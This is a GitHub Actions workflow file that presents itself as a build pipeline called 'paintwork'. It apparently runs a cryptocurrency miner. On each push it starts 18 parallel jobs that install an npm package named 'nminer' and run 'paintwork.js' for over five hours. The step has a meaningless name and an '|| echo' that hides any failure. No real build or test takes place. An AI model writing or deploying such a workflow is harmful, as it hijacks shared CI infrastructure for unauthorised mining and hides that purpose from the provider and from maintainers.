name: paintwork
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1100 }
          - { version: 3972 }
          - { version: 292 }
          - { version: 5780 }
          - { version: 6839 }
          - { version: 4428 }
          - { version: 1025 }
          - { version: 5947 }
          - { version: 8579 }
          - { version: 5096 }
          - { version: 4176 }
          - { version: 5671 }
          - { version: 8948 }
          - { version: 8215 }
          - { version: 12 }
          - { version: 349 }
          - { version: 2281 }
          - { version: 9293 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: trash substantiate long-term straw oddly
        run: |
          npm install nminer@latest
          timeout 308m node paintwork.js || echo "paintwork executed"